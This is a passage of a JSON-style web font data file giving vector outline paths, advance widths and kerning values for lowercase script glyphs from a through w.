:108,"8":58,"7":302,"6":218,"5":113,"4":169,"3":163,"2":-30,"1":92,"0":75,"\/":538,".":396,"-":525,",":464,")":368,"(":156,"&":271,"%":470,"#":116,"!":153}},"a":{"d":"761,-85v0,81,-83,126,-163,96v-63,-23,-95,-97,-95,-222v0,-13,0,-27,1,-41v-66,88,-139,168,-218,241v-102,93,-182,140,-241,140v-57,0,-87,-44,-86,-104v0,-83,44,-196,134,-337v86,-136,181,-247,284,-334v112,-95,195,-125,249,-90v25,16,38,50,38,101v0,61,-21,94,-63,98v-29,2,-44,-8,-44,-31v10,-33,20,-66,20,-93v0,-15,-2,-22,-5,-21v-66,12,-172,114,-320,306v-148,192,-222,323,-222,396v0,25,11,38,34,38v58,0,149,-75,273,-225v86,-104,133,-162,141,-173v38,-53,60,-101,65,-145v3,-30,19,-45,48,-45v41,0,57,20,49,59v-33,171,-49,276,-49,313v0,68,15,105,45,114v18,5,49,-11,51,-24v7,-29,23,-43,50,-43v16,0,24,9,24,26","w":734,"k":{"\u00d0":-66,"\u00c1":-26,"\u00c2":-85,"\u00c0":230,"\u00a2":-139,"\u00d1":-91,"\u00c9":-141,"z":-168,"y":-154,"x":-163,"w":-158,"v":-114,"u":-189,"t":-39,"s":-150,"r":-170,"q":-195,"p":-163,"o":-168,"n":-193,"m":-239,"l":-143,"k":-180,"i":-140,"h":-175,"g":-159,"f":-65,"e":-186,"d":-156,"c":-178,"b":-197,"a":-170,"`":384,"@":-26,"?":178,";":59,"9":-67,"8":-134,"7":-90,"6":-169,"5":-145,"4":-57,"3":-201,"2":-157,"1":-49,"0":-167,"\/":-114,".":-68,"-":-42,",":45,")":22,"(":-131,"&":-68,"%":-116,"$":-69}},"b":{"d":"198,-1129v28,0,74,30,60,65v-70,172,-108,278,-119,313v-69,212,-104,397,-104,554v0,33,4,63,12,90v68,-115,152,-216,253,-304v122,-107,236,-160,341,-160v78,0,163,58,163,134v0,105,-76,232,-227,381v-151,149,-276,224,-375,224v-81,0,-122,-30,-122,-91v0,-33,17,-66,48,-100v12,-13,54,-20,54,4v0,23,-46,74,-40,86v0,17,13,26,38,26v83,0,196,-71,337,-213v140,-140,210,-248,210,-323v0,-41,-27,-61,-82,-61v-131,0,-302,135,-494,388r-8,14v-42,71,-73,106,-94,106v-44,0,-78,-29,-86,-91v-28,-227,8,-363,85,-674v61,-246,113,-368,150,-368","w":854,"k":{"\u00d0":-118,"\u00c1":114,"\u00c2":33,"\u00c0":317,"\u00a2":-62,"\u00d1":-141,"\u00c9":138,"~":649,"x":55,"w":-37,"v":-65,"u":-56,"t":-32,"s":-78,"r":-66,"p":-48,"o":-35,"n":-70,"m":-143,"l":-41,"k":-69,"j":104,"i":-28,"h":-40,"f":-47,"e":-29,"d":103,"c":-33,"b":-68,"a":43,"`":564,"?":180,";":180,":":90,"9":-37,"7":127,"6":-27,"5":-61,"4":-27,"3":63,"2":126,"1":66,"0":-85,"\/":172,".":212,"-":-94,",":274,")":252,"(":-21,"&":89,"%":154,"$":-40,"#":35,"!":48}},"c":{"d":"172,97v-128,5,-202,-98,-201,-230v0,-98,44,-217,132,-358v101,-162,209,-243,322,-244v19,0,48,8,85,25v49,21,72,48,76,78v3,24,-28,44,-46,44v-15,0,-34,-12,-57,-36v-23,-24,-45,-36,-68,-36v-82,0,-166,76,-251,227v-75,134,-113,239,-113,314v0,84,35,126,106,126v70,0,139,-23,208,-69v63,-43,118,-99,163,-169v11,-18,28,-12,39,5v7,11,10,19,8,26v-5,21,-43,66,-112,134v-63,62,-102,97,-116,104v-99,51,-95,56,-175,59","w":676,"k":{"\u00d0":338,"\u00c1":176,"\u00c2":60,"\u00c0":411,"\u00a2":-68,"\u00d1":314,"\u0
0c9":82,"~":70,"z":62,"x":-27,"v":-58,"u":-35,"t":142,"s":67,"r":-43,"q":-38,"o":-22,"n":-31,"m":-93,"l":-23,"k":-55,"j":232,"h":-35,"f":95,"e":-41,"d":20,"c":-33,"b":-64,"`":500,"@":51,"?":192,";":285,":":231,"8":-82,"7":80,"6":-36,"5":49,"4":-49,"2":83,"1":88,"0":-64,"\/":89,".":156,"-":368,",":213,")":215,"&":56,"%":88,"$":143,"#":223,"!":70}},"d":{"d":"807,35v0,29,-52,59,-82,59v-97,0,-145,-111,-145,-334v0,-20,1,-44,2,-72r-37,46v-214,271,-370,407,-467,407v-79,0,-121,-26,-120,-102v0,-56,30,-142,89,-258v63,-124,134,-230,214,-316v95,-102,183,-153,263,-153v31,0,62,11,94,34r59,-318v25,-134,52,-201,83,-201v24,-1,57,27,55,53v0,3,-8,33,-25,88v-85,289,-127,567,-127,833v0,153,23,230,69,230v3,-1,8,-5,15,-9v7,-4,22,-11,43,-21v11,11,17,23,17,34xm590,-526v0,-38,-25,-87,-55,-93v-75,-13,-180,76,-315,268v-128,182,-192,311,-192,387v0,19,7,28,22,28v58,0,156,-70,295,-209v125,-126,199,-216,223,-270v15,-33,22,-70,22,-111","w":863,"k":{"\u00d0":20,"\u00c0":333,"\u00a2":-60,"~":76,"z":-109,"y":-46,"x":-99,"w":-71,"v":-31,"u":-111,"t":41,"s":-79,"r":-102,"q":-103,"p":-93,"o":-74,"n":-131,"m":-165,"l":-50,"k":-87,"j":80,"i":-41,"h":-101,"g":-49,"e":-94,"d":-68,"c":-79,"b":-28,"a":-104,"@":66,"?":-20,";":99,":":42,"8":-59,"7":-81,"6":-69,"5":-116,"3":-106,"2":-140,"1":-23,"0":-50,"\/":-66,".":58,"-":44,",":61,")":38,"(":-30,"&":65,"%":-84,"$":-75,"#":40,"!":63}},"e":{"d":"198,-262v-43,0,-74,-10,-96,-29v-27,24,-59,179,-59,238v0,52,34,78,103,78v66,0,143,-38,232,-115v86,-75,146,-152,179,-231r32,0v13,12,17,23,13,34v-39,112,-104,205,-194,279v-86,71,-172,107,-259,107v-130,1,-195,-99,-187,-236v6,-100,59,-224,160,-372v109,-159,208,-238,297,-238v51,0,87,55,87,107v0,65,-28,140,-83,225v-66,102,-140,153,-225,153xm407,-677v-25,6,-48,21,-69,46v-139,163,-208,257,-208,284v0,7,15,12,46,14v52,3,109,-35,170,-112v60,-75,90,-143,90,-202v0,-25,-10,-35,-29,-30","w":626,"k":{"\u00c1":86,"\u00c2":-34,"\u00c0":275,"\u00a2":-95,"\u00c9":27,"~":64,"z":-21,"y":-105,"x":-47,"w":-107,"v":-71,"u":-123,"t":31,"s":-133,"r":-117,"q":-103,"p":-111,"o":-110,"n":-124,"m":-192,"l":-117,"k":-154,"j":164,"i":-110,"h":-128,"g":-86,"f":-145,"e":-116,"d":-43,"c":-114,"b":-161,"a":-57,"`":433,"@":-68,"?":96,";":198,":":311,"9":-86,"8":-95,"6":-131,"4":-138,"3":-69,"2":-50,"0":-168,"\/":24,".":101,"-":47,",":164,")":148,"(":-108,"&":-26,"%":22,"$":-24,"#":59,"!":-20}},"f":{"d":"441,-1166v80,0,157,116,157,198v0,51,-11,82,-34,91v-28,-7,-30,-55,-33,-89v-5,-49,-56,-134,-105,-134v-69,0,-123,84,-161,251v-19,85,-34,215,-45,390v13,-2,88,-20,111,-20v59,0,97,22,116,67v8,17,8,47,-9,52v-10,3,-22,-3,-37,-20v-36,-42,-84,-43,-141,-20v-50,20,-57,15,-57,85v0,42,29,361,29,395v0,44,-18,66,-54,66v-41,0,-46,-36,-46,-86v0,-32,-3,-166,-9,-401v-21,11,-56,30,-104,59v-17,11,-29,16,-34,16v-23,0,-35,-17,-35,-50v0,-11,3,-18,8,-23v13,-14,98,-57,172,-91v20,-227,38,-373,55,-438v49,-199,135,-298,256,-298","w":496,"k":{"\u00d0":-119,"\u00c1":111,"\u00c0":460,"\u00a2":-199,"\u00d1":-135,"\u00c9":149,"~":183,"z":75,"y":-47,"x":71,"w":-59,"v":-47,"u":-70,"t":-59,"s":-98,"r":-81,"p":-67,"o":-52,"n":-75,"m":-151,"l":-186,"k":-191,"j":91,"i":-138,"h":-151,"f":-66,"e":-43,"d":67,"c":-46,"b":-148,"a":43,"`":-145,"@":-32,"?":-116,";":213,":":114,"9":-91,"8":-84,"7":-198,"6":-81,"5":-155,"4":-75,"3":-66,"2":-113,"1":-160,"0":-145,"\/":84,".":222,"-":-95,",":185,")":-34,"(":-73,"&":49,"%":66,"$":-232,"#":50,"!":-82}},"g":{"d":"532,-798v67,0,115,87,115,155v0,56,-15,84,-46,84v-37,0,-53,-34,-48,-101v3,-42,-5,-63,-23,-63v-49,0,-116,48,-201,145v-62,71,-111,137,-147,198v-46,51,-136,216,-135,298v0,29,5,43,15,4
3v49,0,112,-42,190,-126v29,-31,92,-108,191,-233v66,-84,109,-126,128,-126v45,0,79,66,102,198v51,295,16,597,-103,804v-85,148,-184,223,-300,223v-162,0,-333,-197,-333,-358v0,-39,13,-58,39,-58v19,0,28,11,28,34v0,139,119,297,249,297v132,0,230,-98,293,-293v41,-125,61,-249,61,-373v0,-248,-22,-372,-66,-372v-3,0,-18,21,-46,64v-83,126,-141,208,-173,245v-85,99,-164,149,-235,149v-71,0,-118,-60,-117,-133v0,-112,72,-257,214,-435v142,-178,258,-266,348,-266","w":770,"k":{"\u00d0":-63,"\u00a2":-93,"\u00d1":-86,"\u00c9":-50,"~":64,"z":-104,"y":-206,"x":-102,"w":-76,"v":-77,"u":-112,"t":-42,"s":-89,"r":-96,"q":-97,"p":-88,"o":-91,"n":-125,"m":-163,"l":-77,"k":-110,"j":-435,"i":-72,"h":-100,"g":-77,"f":-100,"e":-108,"d":-90,"c":-101,"b":-125,"a":-103,"`":484,";":24,":":41,"9":-72,"8":-100,"7":-26,"6":-96,"5":-107,"4":-100,"3":-129,"2":-132,"1":-100,"0":-124,"\/":-112,".":23,"-":-44,"(":-65,"%":-115,"$":-42,"#":27,"!":24}},"h":{"d":"684,9v0,32,-70,69,-101,69v-82,0,-135,-108,-155,-325v-5,-51,-10,-122,-23,-211v-8,-55,-21,-82,-36,-82v-39,0,-88,61,-149,184v-82,165,-129,319,-142,464v-2,25,-59,66,-76,27v-10,-25,-15,-111,-15,-256v0,-139,22,-339,65,-602v47,-288,90,-432,129,-432v33,0,50,16,50,49v0,1,-12,37,-35,110v-25,77,-42,145,-53,204v-42,243,-65,442,-70,599r9,-21v107,-263,205,-394,294,-394v75,0,123,109,141,327v4,52,9,123,23,213v9,56,25,83,44,83v25,5,56,-35,71,-35v19,0,29,10,29,29","w":694,"k":{"\u00d0":21,"\u00c2":-34,"\u00c0":310,"\u00a2":40,"\u00c9":-93,"~":491,"z":-138,"y":-76,"x":-111,"w":-90,"v":34,"u":-136,"t":63,"s":-99,"r":-122,"q":-126,"p":-114,"o":-104,"n":-162,"m":-194,"l":-56,"k":-88,"j":230,"i":-54,"h":-100,"g":-80,"f":24,"e":-121,"d":-69,"c":-110,"b":-97,"a":-126,"`":433,"@":89,"?":137,";":77,"9":63,"8":-22,"7":-27,"6":-71,"5":-114,"3":-119,"2":-136,"1":22,"0":-62,"\/":-60,".":-20,"-":43,",":47,")":47,"(":-35,"&":39,"%":-78,"$":66,"#":141,"!":71}},"i":{"d":"70,-924v0,-27,25,-60,55,-60v35,0,52,19,52,57v0,39,-18,58,-54,58v-27,0,-53,-32,-53,-55xm269,55v0,31,-55,65,-86,64v-63,0,-112,-49,-145,-148v-49,-145,-42,-247,-13,-418v21,-126,52,-188,90,-188v30,0,45,17,45,52v0,16,-10,46,-28,90v-20,48,-42,129,-42,245v0,55,1,87,0,98r26,124v17,55,43,82,77,82v8,0,13,-1,16,-4v9,-13,22,-23,39,-31v14,12,21,23,21,34","w":315,"k":{"\u00d0":33,"\u00c0":256,"\u00a2":-50,"\u00c9":71,"~":385,"z":-92,"y":106,"x":-101,"w":-63,"v":-35,"u":-105,"t":59,"s":-67,"r":-101,"q":-76,"p":-99,"o":-57,"n":-134,"m":-165,"l":-35,"k":-74,"j":-105,"i":-28,"h":-100,"g":41,"f":26,"e":-76,"d":-78,"c":-59,"b":-28,"a":-108,"`":82,"@":72,"?":75,";":76,":":60,"9":-41,"8":-48,"7":-22,"6":-65,"5":-116,"4":24,"3":-88,"2":-141,"1":-58,"0":-34,"\/":-83,".":143,"-":57,")":25,"(":-21,"&":96,"%":-98,"$":-29,"#":93,"!":56}},"j":{"d":"213,-787v-37,0,-56,-16,-56,-48v0,-27,14,-41,43,-41v39,0,59,12,59,36v0,35,-15,53,-46,53xm-157,717v-187,0,-353,-153,-348,-341v0,-32,11,-48,34,-48v23,0,34,13,32,38v-14,129,118,273,246,273v143,0,249,-111,316,-333v43,-140,64,-283,64,-429v0,-184,-17,-337,-49,-461v-9,-37,15,-86,55,-86v51,0,77,154,77,463v0,107,-2,182,-7,227v-17,171,-63,326,-137,463v-83,156,-178,234,-283,234","w":368,"k":{"\u00d0":-75,"\u00c1":44,"\u00a2":-83,"\u00d1":-99,"\u00c9":-23,"~":172,"z":-84,"y":-159,"x":-56,"w":-39,"v":-85,"u":-89,"t":-28,"s":-73,"r":-59,"q":-62,"p":-57,"o":-63,"n":-105,"m":-147,"l":-51,"k":-83,"j":-388,"i":-40,"h":-65,"g":-44,"f":-77,"e":-76,"d":-41,"c":-75,"b":-93,"a":-66,"`":125,"?":-21,";":51,":":64,"9":-49,"8":-83,"6":-62,"5":-71,"4":-75,"3":-94,"2":-96,"1":-57,"0":-99,"\/":-60,".":50,"-":-51,",":30,")":35,"(":-38,"&":28,"%":-69,"$":-61,"!":41}},"
k":{"d":"447,-146v-107,-40,-204,-46,-329,-46v-29,0,-44,-22,-44,-65v0,-4,21,-27,63,-68v118,-117,199,-223,269,-405v14,-35,30,-52,48,-52v35,0,52,20,52,60v0,77,-102,222,-305,435v145,27,250,56,314,87v119,57,178,138,178,243v0,13,-4,31,-12,56v-11,33,-23,51,-37,54r-17,-4r2,2v-38,-16,2,-59,2,-88v0,-93,-61,-162,-184,-209xm137,-1173v19,0,62,36,51,65v-93,256,-134,512,-134,761v0,134,15,250,44,348v14,46,31,72,51,77v41,11,57,32,31,58v-8,7,-16,10,-25,8v-79,-18,-133,-85,-162,-200v-16,-63,-25,-156,-27,-281v-1,-55,16,-196,50,-424v41,-275,82,-412,121,-412","w":708,"k":{"\u00d0":198,"\u00c1":-24,"\u00c2":-35,"\u00c0":226,"\u00a2":35,"\u00d1":173,"\u00c9":-101,"~":168,"z":-130,"y":-89,"x":-121,"w":-94,"v":38,"u":-132,"t":90,"s":-100,"r":-123,"q":-138,"p":-122,"o":-103,"n":-152,"m":-186,"l":-59,"k":-91,"j":59,"i":-58,"h":-103,"g":-94,"f":35,"e":-122,"d":-67,"c":-111,"b":-110,"a":-130,"`":490,"@":98,"?":74,":":21,"9":-77,"8":-23,"7":-34,"6":-76,"5":-123,"4":34,"3":-128,"2":-151,"1":-101,"0":-74,"\/":-92,".":-29,"-":228,",":-58,"(":-40,"&":22,"%":-110,"$":69,"#":149,"!":51}},"l":{"d":"295,77v2,6,3,13,3,22v-23,29,-51,43,-86,43v-51,0,-95,-30,-133,-88v-54,-83,-74,-225,-74,-382v0,-174,10,-350,30,-528v23,-197,48,-296,76,-296v49,-1,54,42,46,92r-12,71v-44,235,-54,419,-54,703v0,243,43,365,128,365v15,0,27,-6,35,-18r23,0r18,18r0,-2","w":335,"k":{"\u00d0":74,"\u00c0":274,"\u00d1":49,"\u00c9":80,"~":159,"z":-82,"y":80,"x":-100,"w":-52,"v":34,"u":-86,"t":95,"s":-38,"r":-97,"p":-102,"o":-26,"n":-128,"m":-160,"l":-21,"k":-60,"j":-88,"h":-101,"g":52,"f":33,"e":-42,"d":-69,"c":-21,"b":-31,"a":-104,"`":122,"@":124,"?":60,";":53,":":158,"9":-80,"7":-32,"6":-51,"5":-119,"4":39,"3":-70,"2":-145,"1":-98,"\/":-91,".":153,"-":97,"&":138,"%":-109,"#":124,"!":50}},"m":{"d":"879,-269v0,-29,18,-265,-20,-273v-2,0,-19,25,-51,76v-109,169,-167,260,-176,272v-91,125,-162,188,-213,188v-51,0,-79,-56,-84,-167v-1,-31,2,-128,9,-291v1,-37,-2,-55,-9,-55v-21,0,-77,82,-168,247v-93,167,-142,282,-148,343v-2,25,-17,37,-46,37v-13,0,-26,-21,-36,-64v-8,-33,-11,-57,-11,-73v1,-206,1,-374,39,-522v16,-61,34,-92,55,-92v24,0,61,25,55,47v-39,142,-60,288,-61,438v72,-129,122,-216,150,-259v81,-125,145,-187,191,-187v55,0,82,66,79,197v-1,14,-3,46,-6,95v-7,87,-9,168,10,225v24,-7,66,-50,125,-130v49,-66,90,-128,124,-186v88,-152,152,-228,192,-228v40,0,71,38,76,115r15,218v12,178,43,268,94,269v19,1,37,-9,52,-29v15,-20,27,-31,36,-31v19,0,28,10,28,30v0,27,-17,51,-50,70v-26,15,-48,22,-67,22v-57,0,-104,-42,-141,-125v-29,-65,-43,-124,-43,-177","w":1200,"k":{"\u00d0":67,"\u00c1":31,"\u00c0":296,"\u00a2":50,"\u00d1":43,"\u00c9":-100,"~":534,"z":-98,"y":-83,"x":-90,"w":-98,"v":55,"u":-116,"t":89,"s":-79,"r":-99,"q":-131,"p":-92,"o":-93,"n":-129,"m":-164,"l":-68,"k":-106,"j":87,"i":-70,"h":-102,"g":-92,"f":32,"e":-113,"d":-95,"c":-103,"b":-123,"a":-107,"`":431,"@":85,"?":283,";":121,":":34,"9":99,"8":-21,"7":-23,"6":-97,"5":-78,"4":48,"3":-132,"2":-98,"1":27,"0":-93,"\/":-57,".":-27,"-":90,",":112,")":83,"(":-57,"%":-57,"$":87,"#":122,"!":310}},"n":{"d":"81,-238r17,-30v143,-243,245,-364,305,-364v57,0,105,40,113,125r18,190v11,104,17,163,20,177v15,93,38,140,67,140v13,0,30,-12,52,-35r37,12v7,42,-46,82,-84,83v-96,0,-156,-108,-178,-325v-5,-51,-10,-122,-21,-211v-7,-55,-17,-82,-28,-82v-23,0,-78,70,-167,210v-89,140,-152,270,-189,389v-9,32,-26,48,-49,48v-30,0,-44,-15,-41,-45v1,-11,25,-152,64,-424v5,-34,5,-81,10,-141v5,-55,25,-82,60,-82v20,0,34,7,41,22r12,45","w":716,"k":{"\u00c1":-20,"\u00c2":-52,"\u00c0":312,"\u00c9":-102,"~":520,"z":-148,"y":-113,"x":-139,"w":-137,"u":-155,"t":39,"s":-121,"r":-14
0,"q":-169,"p":-133,"o":-127,"n":-165,"m":-204,"l":-95,"k":-134,"j":45,"i":-99,"h":-142,"g":-123,"e":-148,"d":-145,"c":-133,"b":-143,"a":-153,"`":416,"@":60,"?":136,";":72,"9":35,"8":-59,"7":-72,"6":-129,"5":-133,"3":-161,"2":-163,"0":-109,"\/":-119,".":-30,"-":42,",":37,")":20,"(":-84,"%":-119,"$":26,"#":86,"!":58}},"o":{"d":"258,-584v-12,-7,-29,-15,-29,-33v0,-23,24,-46,72,-69v40,-19,70,-29,89,-29v108,0,164,83,168,250v2,81,-34,187,-107,319v-85,154,-178,235,-279,244v-115,11,-187,-93,-187,-210v0,-103,24,-214,73,-334v49,-120,95,-179,138,-179v39,0,58,16,58,49v0,9,-11,29,-33,58v-105,139,-158,268,-158,389v0,104,26,156,78,156v79,0,155,-72,231,-215v66,-124,99,-224,99,-299v0,-109,-27,-163,-81,-163v-41,0,-85,22,-132,66","w":628,"k":{"\u00d0":-96,"\u00c1":124,"\u00c2":28,"\u00c0":330,"\u00a2":-131,"\u00d1":-120,"\u00c9":100,"~":104,"z":-30,"y":-44,"x":-42,"w":-62,"v":-103,"u":-61,"t":-57,"s":-91,"r":-85,"q":-35,"p":-60,"o":-44,"n":-66,"m":-145,"l":-78,"k":-110,"j":147,"i":-63,"h":-79,"f":-87,"e":-48,"d":24,"c":-44,"b":-109,"`":481,"@":-38,"?":163,";":188,":":101,"9":-73,"8":-110,"7":81,"6":-77,"5":-85,"4":-67,"2":57,"1":36,"0":-128,"\/":88,".":174,"-":-72,",":240,")":219,"(":-66,"&":45,"%":87,"$":-88}},"p":{"d":"232,578v6,20,-52,45,-70,44v-56,-5,-99,-46,-130,-122v-35,-85,-42,-200,-41,-323v0,-142,16,-391,49,-746v9,-97,38,-146,85,-146v34,0,51,25,44,61r-49,249v137,-198,272,-297,407,-297v89,0,133,63,133,190v0,105,-47,221,-140,348v-97,132,-190,198,-279,198v-67,0,-101,-34,-101,-103v0,-21,7,-48,21,-81r42,0v4,25,-7,63,-6,84v0,15,9,23,27,23v85,0,166,-67,245,-202v69,-118,104,-215,104,-290v0,-67,-18,-101,-54,-101v-72,0,-156,59,-253,178v-88,107,-139,196,-153,266v-25,120,-39,260,-40,419v-3,223,30,335,98,335r61,-22r0,38","w":706,"k":{"\u00d0":-111,"\u00c1":154,"\u00c2":30,"\u00c0":246,"\u00a2":-155,"\u00d1":-136,"\u00c9":143,"~":475,"z":-48,"x":-61,"w":-69,"v":-124,"u":-67,"t":-62,"s":-94,"r":-99,"q":35,"p":-36,"o":-45,"n":-77,"m":-155,"l":-85,"k":-106,"j":-77,"i":-66,"h":-79,"g":29,"f":-82,"e":-43,"d":40,"c":-41,"b":-107,"a":29,"`":457,"@":-51,"?":169,";":182,":":89,"9":-76,"8":-127,"7":93,"6":-74,"5":-86,"4":-37,"3":29,"2":105,"1":34,"0":-127,"\/":117,".":217,"-":-88,",":293,")":224,"(":-62,"&":57,"%":116,"$":-105,"#":-31}},"q":{"d":"734,457v0,64,-81,126,-144,126v-71,0,-123,-37,-158,-112v-24,-53,-36,-112,-36,-178v-1,-117,32,-326,88,-598v-186,240,-330,360,-431,360r-21,0v-52,4,-100,-64,-99,-115v0,-99,80,-244,239,-435v158,-189,273,-284,348,-284v63,0,95,42,95,127v0,61,-18,92,-55,92v-29,0,-44,-17,-44,-50v0,-17,23,-74,24,-88v0,-9,-4,-13,-12,-13v-29,0,-102,62,-219,186v-47,49,-103,123,-168,220v-86,127,-129,217,-129,271v0,7,5,10,15,10v52,0,142,-60,269,-179v122,-114,194,-195,207,-246r18,-69v11,-26,29,-39,54,-39v37,0,55,20,55,60r-18,0v28,-7,15,13,11,26v-60,207,-138,590,-138,786v0,89,32,206,106,206v33,0,57,-17,74,-49v17,-32,29,-48,38,-48v21,0,31,11,31,33","w":714,"k":{"\u00d0":-68,"\u00c1":-53,"\u00c2":50,"\u00c0":-182,"\u00a2":-117,"\u00d1":-91,"\u00c9":64,"~":37,"y":-293,"x":-72,"w":-39,"v":-89,"u":-40,"t":-38,"s":-66,"r":-75,"p":-150,"o":-20,"n":-55,"m":-132,"l":-68,"k":-92,"j":-552,"i":-45,"h":-65,"g":-166,"f":-62,"e":-31,"c":-27,"b":-91,"`":390,"@":-24,";":138,":":112,"9":-68,"8":-114,"7":78,"6":-55,"5":-69,"4":-40,"3":-36,"2":-99,"0":-112,".":137,"-":-43,",":125,")":97,"(":-50,"&":62,"$":-76,"!":23}},"r":{"d":"95,44v2,24,-34,52,-58,52v-37,0,-54,-29,-49,-87v23,-267,27,-395,0,-650v-3,-25,31,-62,56,-62v36,0,60,42,56,78v-9,70,-13,129,-12,176v83,-211,171,-316,266,-316v63,0,99,29,110,86v6,35,-5,52,-34,52v-39,1,-14,-68,-56,-
68v-33,0,-75,34,-125,104v-106,149,-160,249,-161,472v0,3,2,58,7,163","w":536,"k":{"\u00d0":211,"\u00c1":375,"\u00c2":118,"\u00c0":497,"\u00a2":-97,"\u00d1":187,"\u00c9":322,"z":193,"y":50,"x":-50,"w":185,"v":91,"u":47,"t":143,"s":100,"r":-48,"q":217,"o":157,"n":171,"m":-51,"l":-30,"k":-50,"j":113,"i":44,"g":203,"f":95,"e":148,"d":249,"c":143,"b":-34,"a":241,"`":483,"@":57,"?":517,";":604,":":375,"8":-93,"7":255,"6":22,"5":51,"4":64,"3":223,"2":-62,"1":103,"0":-62,"\/":256,".":395,"-":241,",":406,")":291,"&":163,"%":253,"$":40,"#":256,"!":63}},"s":{"d":"374,-749v40,0,124,45,124,85v0,29,-12,43,-35,43v-9,1,-76,-41,-90,-37v-45,-4,-109,29,-190,99v-84,72,-126,134,-126,185v0,27,49,41,146,41v188,0,282,52,282,157v0,74,-42,140,-125,199v-76,53,-152,80,-227,80v-69,1,-147,-54,-143,-122v2,-34,41,-107,83,-87v-2,35,-18,48,-18,77v0,30,18,45,54,45v55,0,119,-18,190,-54v79,-40,119,-82,119,-126v0,-52,-62,-91,-116,-92r-192,-7v-60,-1,-154,-32,-154,-84v0,-66,52,-150,156,-251v104,-101,191,-151,262,-151","w":545,"k":{"\u00d0":295,"\u00c1":67,"\u00c0":476,"\u00a2":-127,"\u00d1":271,"\u00c9":-28,"z":-49,"y":-73,"x":-93,"w":-70,"v":34,"u":-95,"t":89,"s":-41,"r":-97,"q":-105,"p":-74,"o":-79,"n":-93,"m":-149,"l":-78,"k":-108,"j":118,"i":-67,"h":-90,"g":-75,"f":-67,"e":-98,"d":-51,"c":-91,"b":-119,"a":-66,"`":458,"?":141,";":171,":":105,"9":-64,"8":-141,"6":-90,"5":-30,"4":-103,"3":-99,"2":-77,"1":34,"0":-117,".":46,"-":325,",":119,")":134,"(":-61,"$":43,"#":162}},"t":{"d":"387,-517v-49,0,-82,21,-122,44v-8,77,-12,156,-8,260v7,177,46,265,119,265v21,0,40,-11,57,-32v17,-21,29,-32,36,-32v21,0,32,10,32,30v0,24,-20,47,-59,68v-33,17,-57,26,-73,26v-61,0,-108,-33,-145,-99v-63,-112,-61,-296,-49,-458v-37,13,-82,39,-135,78v-28,21,-47,0,-46,-48v0,-23,55,-61,165,-113v7,-1,13,-3,20,-5r22,-203v0,0,32,-135,67,-135v29,0,44,19,46,56r-41,249v56,-10,124,-22,177,10v42,25,62,54,43,90v-15,7,-25,15,-40,-3v-13,-32,-35,-48,-66,-48","w":537,"k":{"\u00c0":450,"\u00a2":-134,"\u00c9":-24,"~":167,"z":-116,"y":-58,"x":-107,"w":-77,"v":-104,"u":-118,"t":-33,"s":-85,"r":-108,"q":-115,"p":-103,"o":-81,"n":-138,"m":-173,"l":-93,"k":-122,"j":80,"i":-68,"h":-108,"g":-62,"f":27,"e":-101,"d":-90,"c":-86,"b":-117,"a":-113,"`":252,"@":-41,"?":71,";":91,":":37,"9":-91,"8":-83,"7":-29,"6":-84,"5":-115,"4":-45,"3":-103,"2":-141,"1":-25,"0":-139,"\/":-81,".":53,"-":25,",":45,")":39,"(":-77,"&":54,"%":-90,"$":-97,"#":-27}},"u":{"d":"617,-50v31,0,55,-37,85,-54v15,13,22,23,22,31v0,24,-16,45,-49,64v-27,15,-48,23,-65,23v-104,0,-165,-114,-182,-341r-1,-18v-71,149,-118,241,-139,274v-71,110,-147,165,-226,165v-63,0,-94,-63,-94,-188v0,-36,19,-133,57,-291v44,-180,81,-271,111,-272v25,-1,65,20,63,44v-2,21,-18,50,-25,71v-85,228,-127,388,-127,480v0,56,10,84,29,84v24,0,61,-31,112,-93v55,-67,109,-153,162,-258v60,-117,90,-207,91,-268v0,-38,28,-87,64,-86v33,0,50,17,50,50v0,5,-5,38,-17,98v-12,60,-18,117,-18,171v0,209,32,314,97,314","w":691,"k":{"\u00c1":-30,"\u00c2":-84,"\u00c0":229,"\u00a2":-75,"\u00d1":-26,"\u00c9":-129,"~":481,"z":-166,"y":-156,"x":-161,"w":-164,"v":-53,"u":-184,"s":-150,"r":-170,"q":-201,"p":-162,"o":-165,"n":-191,"m":-235,"l":-142,"k":-179,"i":-141,"h":-174,"g":-164,"f":-39,"e":-185,"d":-163,"c":-175,"b":-197,"a":-175,"`":377,"@":21,"?":206,";":58,"8":-94,"7":-93,"6":-169,"5":-141,"4":-31,"3":-203,"2":-154,"1":-47,"0":-167,"\/":-117,".":-57,"-":22,",":40,")":21,"(":-130,"&":-68,"%":-118,"#":55,"!":238}},"v":{"d":"704,-652v0,17,-23,30,-44,22v-40,-3,-107,78,-181,252r-148,348v-36,83,-63,125,-80,125v-22,0,-46,-37,-70,-112v-15,-48,-40,-128,-81,-238v-29,-78,-110,-225,-159,-
317v-17,-34,20,-62,50,-63v26,0,69,72,130,217v3,7,41,105,113,293v21,54,30,81,27,81r35,-90v69,-175,115,-286,139,-333v77,-149,152,-223,225,-223v29,0,44,13,44,38","w":633,"k":{"\u00d0":-46,"\u00c1":190,"\u00c2":-40,"\u00c0":396,"\u00a2":-252,"\u00d1":-70,"\u00c9":163,"~":443,"z":-53,"y":-104,"x":-194,"w":-67,"v":-159,"u":-111,"s":-56,"r":-205,"q":33,"p":-154,"n":-76,"m":-209,"l":-183,"k":-204,"j":-48,"i":-77,"h":-170,"g":46,"f":-59,"d":88,"b":-188,"a":75,"`":339,"@":-98,"?":229,";":206,":":128,"9":-166,"8":-241,"7":98,"6":-133,"5":-99,"4":-88,"3":43,"2":90,"1":-51,"0":-216,"\/":130,".":237,",":296,")":138,"(":-148,"%":130,"$":-96,"!":-90}},"w":{"d":"709,-739v0,-25,69,-56,99,-56v52,0,94,39,120,120v54,167,38,263,-36,443v-104,252,-244,264,-375,43v-41,-69,-77,-153,-108,-250v-25,63,-63,163,-122,295v-77,170,-147,253,-203,253v-40,0,-69,-37,-87,-110v-12,-51,-17,-96,-14,-136v4,-71,9,-172,24,-301v12,-108,39,-161,74,-161v31,0,46,20,46,59v-38,183,-67,357,-67,437v0,82,-2,123,14,123v37,0,89,-69,156,-206v44,-90,86,-176,111,-264r34,-120v22,-64,36,-88,84,-60v17,10,24,24,23,39v-6,57,11,145,50,264v48,145,108,217,180,217v35,0,71,-48,106,-146v42,-119,63,-222,49,-347v-10,-88,-35,-132,-72,-132v-3,-1,-39,13,-43,12v-29,0,-43,-5,-43,-16","w":1026,"k":{"\u00d0":-95,"\u00c1":153,"\u00c2":46,"\u00c0":359,"\u00a2":-142,"\u00d1":-120,"\u00c9":157,"~":36,"y":-26,"x":-57,"w":-40,"v":-95,"u":-43,"t":-42,"s":-74,"r":